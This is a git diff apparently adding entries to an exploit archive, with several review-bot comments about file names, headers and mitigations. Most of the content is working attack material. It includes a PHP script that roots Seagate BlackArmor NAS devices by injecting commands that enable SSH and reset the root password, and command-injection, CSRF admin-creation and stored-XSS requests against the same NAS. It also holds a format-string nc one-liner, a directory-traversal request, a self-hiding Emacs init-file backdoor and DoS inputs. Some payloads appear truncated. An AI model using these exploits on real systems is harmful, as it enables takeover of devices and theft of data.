"'\n"; + + } else { + + $root_password = preg_replace( "/\r|\n/", "", $line); + + } + + + + $ch = curl_init(); + + + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_POST, true); + + curl_setopt($ch, CURLOPT_POSTFIELDS, "sectok=" . $sectok . +"&id=playground:playground&do[save]=Save&wikitext=exec(\"/usr/sbin/drop +bear start;\"); exec(\"echo '" . $root_password . "' | passwd +--stdin;\");"); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + + curl_setopt($ch, CURLOPT_AUTOREFERER, 1); + + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); + + + + curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url . "/wiwiki/doku.php"); + + curl_exec($ch); + + curl_close($ch); + + + + echo "- The devices is rooted! The password is: " . +$root_password ."\n"; + + echo "- The SSH daemon was also enabled!!\n\n"; + + + + } else { + + echo "- Can't root the device due to lack of admin +credentials\n"; + + + + echo "- However, do you want to reset the admin password? [yes]:"; + + $handle = fopen ("php://stdin","r"); + + $line = fgets($handle); + + + + if(trim($line) == "yes") { + + + + $httpResponseCode = RemoteFileExist($argv[1] . +"/backupmgt/immediate_log/instance.log"); + + + + if ($httpResponseCode == "200") { + + RemoteCodeExec($argv[1], "sed '11,16d' +/proto/SxM_webui/d41d8cd98f00b204e9800998ecf8427e.php > +/proto/SxM_webui/reset.php"); + + RemoteCodeExec($argv[1], "chmod 755 +/proto/SxM_webui/reset.php"); + + + + echo "- Now go to: " . $argv[1] . "/reset.php to +reset the default credentials to admin/admin.\n"; + + exit; + + } else { + + echo "Something went wrong, the HTTP error code is: +" . $httpResponseCode . "\n"; + + } + + } else { + + echo "Exit....\n"; + + exit; + + } + + } + + + +} else { + + echo "- No passwords were found!\n"; + + + + echo "- However, do you want to reset the admin password? 
[yes]:"; + + $handle = fopen ("php://stdin","r"); + + $line = fgets($handle); + + + + if(trim($line) == "yes") { + + + + $httpResponseCode = RemoteFileExist($argv[1] . +"/backupmgt/immediate_log/instance.log"); + + + + if ($httpResponseCode == "200") { + + RemoteCodeExec($argv[1], +"sed '11,16d' /proto/SxM_webui/d41d8cd98f00b204e9800998ecf8427e.php > +/proto/SxM_webui/reset.php"); + + RemoteCodeExec($argv[1], "chmod 755 +/proto/SxM_webui/reset.php"); + + + + echo "- Now go to: " . +$argv[1] . "/reset.php to reset the default credentials to admin/admin.\n"; + + exit; + + } else { + + echo "Something went wrong, the HTTP error +code is: " . $httpResponseCode . "\n"; + + } + + } else { + + echo "Exit....\n"; + + exit; + + } + +} + + + +?> \ No newline at end of file diff --git a/platforms/hardware/webapps/30725.txt b/platforms/hardware/webapps/30725.txt new file mode 100755 index 000000000..7341bac2a --- /dev/null +++ b/platforms/hardware/webapps/30725.txt @@ -0,0 +1,65 @@ +# Exploit Title: Seagate BlackArmor NAS - Remote Command Execution + +# Google Dork: N/A + +# Date: 04-01-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://www.seagate.com/ + +# Software Link: + +http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ + +# Version: sg2000-2000.1331 + +# Tested on: N/A + +# CVE : CVE-2013-6924 + +# + +## Description: + +# + +# The file getAlias.php located in /backupmgt has the following lines: + +# + +# $ipAddress = $_GET["ip"; + +# if ($ipAddress != "") { + +# exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt"); + +# .. + +# .. + +# } + +# + +# The GET parameter can easily be manipulated to execute commands on the +BlackArmor system. + +# + +## Proof of Concept: + +# + +# http(s):///backupmgt/getAlias.php?ip=xx /etc/passwd; ; + +# + +## Example to change the root password to 'mypassword': + +# + +# http(s):///backupmgt/getAlias.php?ip=xx /etc/passwd; echo +'mypassword' | passwd --stdin; 
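Review bot: 30723.php carries no header naming the firmware or CVEs it covers, although the sibling advisory 30725.txt in this commit gives sg2000-2000.1331 and CVE-2013-6924 for the same `/backupmgt/getAlias.php?ip=` request that `RemoteCodeExec` issues here. I would add a comment block at the top stating that, together with the request paths the script touches (`/admin/config.xml`, `/admin/sxmJEWAB/SXMjewab.php?telnet=`, `/admin/dokuwiki_service.php`, `/backupmgt/getAlias.php`), since those are what the owner of such a device would search for in its web logs. The same header should record two side effects that are easy to miss: `MD5DecryptorGoogle` sends every password hash read from `config.xml` to `http://www.google.com/search?q=%s` over plain HTTP, and recovered hash/password pairs and the session cookie are left behind in `md5.hash` and `cookie.txt` in the working directory. The opening `<?php` tag is not visible at the start of the hunk, which may only be a rendering loss on this page.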
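Review bot: The 30725.txt advisory stops at the proof of concept and gives no remediation for the `exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt")` call it quotes under Description. A line such as `# Mitigation: accept ip only if filter_var($ipAddress, FILTER_VALIDATE_IP) succeeds, and pass it through escapeshellarg() before exec()` after the code excerpt would tell readers what a corrected handler looks like. The quoted `$ipAddress = $_GET["ip";` is also missing its closing bracket as shown here; if that is in the committed file rather than lost in rendering, it should read `$_GET["ip"];`.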
diff --git a/platforms/hardware/webapps/30726.2013-6922 b/platforms/hardware/webapps/30726.2013-6922 new file mode 100755 index 000000000..bbddc66e4 --- /dev/null +++ b/platforms/hardware/webapps/30726.2013-6922 @@ -0,0 +1,62 @@ +# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery + +# Google Dork: N/A + +# Date: 04-01-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://www.seagate.com/ + +# Software Link: +http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ + +# Version: sg2000-2000.1331 + +# Tested on: N/A + +# CVE : CVE-2013-6922 + +# + +## Description: + +# + +# There are multiple CSRF attacks possible, the proof of concept shows how +it is possible to add + +# a user with administrative privileges to the system. +# +# It is also possible to: + +# + +# 1. Factory reset the device + +# 2. Reboot the device + +# 3. Add/Edit/Remove users +# 4. Add/Edit/Remove shares and volumes + +# +# This vulnerability was reported to Seagate in September 2013, they stated +that this will not be fixed. + +# + +## Proof of Concept: + +# + +# POST: http(s):///admin/access_control_user_add.php?lang=en&gi=a001&fbt=23 +# Parameters: + +# + +# username attacker +# adminright yes +# fullname hacker +# userpasswd attackers_password +# userpasswdcheck attackers_password diff --git a/platforms/hardware/webapps/30727.txt b/platforms/hardware/webapps/30727.txt new file mode 100755 index 000000000..9afbf7973 --- /dev/null +++ b/platforms/hardware/webapps/30727.txt 
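Review bot: The new file is created as `platforms/hardware/webapps/30726.2013-6922`, so its extension is a fragment of the CVE id from its own header (`CVE-2013-6922`) rather than a file type, while the other BlackArmor write-ups in this commit end in `.txt` or `.php`. Anything that picks a viewer, MIME type or scanning rule by extension will treat it as unknown. I would rename it to `30726.txt` and change the matching files.csv row to start `30726,platforms/hardware/webapps/30726.txt,`. Since the text records that Seagate declined to fix the issue, a closing line stating the practical mitigation (keep the admin interface off untrusted networks and avoid browsing other sites while logged in to it) would complete the advisory.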
@@ -0,0 +1,75 @@ +# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site +Scripting Vulnerabilities + +# Google Dork: N/A + +# Date: 04-01-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://www.seagate.com/ + +# Software Link: + +http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ + +# Version: sg2000-2000.1331 + +# Tested on: N/A + +# CVE : CVE-2013-6923 + +# + +## Description: + +# + +# When adding a user to the device, it is possible to enter a full name. +This input field does not + +# sanitize its input and it is possible to enter any payload which will get +executed upon reload. + +# + +# The workgroup configuration is also vulnerable to persistent XSS. The Work +Group name input +# field does not sanitize its input. + +# +# This vulnerability was reported to Seagate in September 2013, they stated +that this will not be fixed. + +# + +## Proof of Concept #1: + +# + +# POST: http(s):///admin/access_control_user_edit.php?id=2&lang=en +# Parameters: + +# + +# index = 2 +# fullname = +# submit = Submit + +# + +# + +## Proof of Concept #2: + +# + +# POST: http(s):///admin/network_workgroup_domain.php?lang=en&gi=n003 + +# Parameter: + +# + +# workname = "> diff --git a/platforms/linux/dos/30724.txt b/platforms/linux/dos/30724.txt new file mode 100755 index 000000000..573f7afd1 --- /dev/null +++ b/platforms/linux/dos/30724.txt 
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26270/info
+
+Perdition IMAP proxy server is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
+
+An attacker can exploit this issue to execute arbitrary machine code in the context of the affected application. A successful attack will compromise the application. Failed attempts may cause denial-of-service conditions.
+
+This issue affects Perdition 1.17 and prior versions.
+
+The following proof of concept is available:
+
+perl -e 'print "abc%n\x00\n"' | nc perdition.example.com 143
\ No newline at end of file
diff --git a/platforms/linux/remote/30711.txt b/platforms/linux/remote/30711.txt
new file mode 100755
index 000000000..81d6e4750
--- /dev/null
+++ b/platforms/linux/remote/30711.txt
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/26212/info
+
+Shttp is prone to a remote directory-traversal vulnerability.
+
+A remote attacker can exploit this issue by using directory-traversal sequences to retrieve arbitrary files on a victim user's computer.
+
+Versions prior to Shttp0.0.5 are vulnerable to this issue.
+
+HEAD /../../etc/passwd HTTP/1.0
+
+HTTP/1.1 400 Bad Request
+Content-Type: text/html
+Server: Shttp/ServerKit
+Date: Thu, 25 Oct 2007 16:31:30 GMT
+Connection: close
+
+
+HEAD /../../var/log/messages HTTP/1.0
+
+HTTP/1.1 200 OK
+Content-Length: 178455
+Content-Type: text/plain
+Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
+Server: Shttp/ServerKit
+Date: Thu, 25 Oct 2007 16:42:32 GMT
+Connection: close
\ No newline at end of file
diff --git a/platforms/linux/remote/30736.txt b/platforms/linux/remote/30736.txt
new file mode 100755
index 000000000..1820587d0
--- /dev/null
+++ b/platforms/linux/remote/30736.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/26327/info
+
+Emacs is prone to a vulnerability that lets attackers execute arbitrary code.
+
+Due to a design error, the application ignores certain security settings and modifies local variables.
+
+By supplying a malicious file, an attacker can exploit this issue to carry out various attacks, including executing arbitrary code in the context of the application. This may facilitate remote unauthorized access.
+
+This issue affects Emacs 22.1; other versions may be vulnerable as well.
+
+This is a harmless text file. Or at least it looks like one. In
+fact, it is. But it's almost not. If you were to change the word
+"variaboles" below to "variables", then load it into a vulnerable
+Emacs 22 with `enable-local-variables' set to :safe, it would rewrite
+the local variables list in the buffer itself to _look_ like a
+harmless text file, while in fact managing to add some evil code to
+the end of your user-init-file. Woopsy.
+
+| Local variaboles:
+| hack-local-variables-hook: ((lambda () (save-excursion (with-temp-buffer (insert "\n(run-with-timer 1 nil (lambda () (beep) (message \"Your Emacs init file is compromised!\")))") (append-to-file (point-min) (point-max) user-init-file)) (message nil) (with-current-buffer (get-buffer "*Messages*") (when (search-backward (concat "Added to " user-init-file) nil t) (let ((start (point-at-bol))) (forward-line +1) (delete-region start (point))))) (goto-char (point-max)) (search-backward "| hack-local-variables-hook") (let ((start (point-at-bol))) (forward-line +1) (delete-region start (point))) (insert "| mode: text\n") (set-buffer-modified-p nil) (text-mode))))
+| End:
diff --git a/platforms/linux/remote/30744.txt b/platforms/linux/remote/30744.txt
new file mode 100755
index 000000000..0dba485a6
--- /dev/null
+++ b/platforms/linux/remote/30744.txt
@@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/26353/info + +MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. + +Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. + +This issue affects MySQL 5.1.23 and prior versions. + +mysql> CREATE TABLE `test` ( +`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, +`foo` text NOT NULL +) ENGINE=InnoDB DEFAULT CHARSET=latin1; +Query OK, 0 rows affected + +mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); +Empty set + +mysql> ALTER TABLE test ADD INDEX (foo(100)); +Query OK, 0 rows affected +Records: 0 Duplicates: 0 Warnings: 0 + +mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); \ No newline at end of file diff --git a/platforms/multiple/dos/30713.html b/platforms/multiple/dos/30713.html new file mode 100755 index 000000000..0690e41c4 --- /dev/null +++ b/platforms/multiple/dos/30713.html @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/26216/info + +Mozilla Firefox is prone to a vulnerability that results in a persistent denial of service. + +This issue occurs when a victim sets a malicious bookmark and then follows it. + +Successful attacks will cause Firefox to stop responding to all URI requests. + +NOTE: This condition persists even after the browser is restarted. + +Mozilla Firefox 2.0.0.8 is vulnerable; other versions may also be affected. + + diff --git a/platforms/multiple/remote/30729.txt b/platforms/multiple/remote/30729.txt new file mode 100755 index 000000000..9af20d10a --- /dev/null +++ b/platforms/multiple/remote/30729.txt 
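Review bot: 30744.txt is filed under `platforms/linux/remote/`, but its own text describes a denial of service that requires valid credentials and the ability to run arbitrary SQL statements. Anyone triaging by directory will read it as remote access or code execution, while a `dos` category (for example `platforms/linux/dos/`) matches the stated impact. The entry also names "MySQL 5.1.23 and prior versions" as affected without giving a fixed release or a source beyond the BID link, which is the detail an operator needs to decide whether to patch.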
@@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/26286/info + +Blue Coat ProxySG Management Console is prone to two cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Versions prior to ProxySG 4.2.6.1 and 5.2.2.5 are vulnerable. + +NOTE: This BID originally covered one issue, but was updated to also cover a second issue. + +https://www.example.com:8082/Secure/Local/console/install_upload_action/crl_format?name="%00 https://www.example.com:8082/Secure/Local/console/install_upload_from_file.htm?file= + + + + + + \ No newline at end of file diff --git a/platforms/windows/remote/30720.html b/platforms/windows/remote/30720.html new file mode 100755 index 000000000..66247fc52 --- /dev/null +++ b/platforms/windows/remote/30720.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26244/info + +GlobalLink is prone to a stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. + +An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. + +GlobalLink 2.7.0.8 is affected by this issue; other versions may also be vulnerable. + +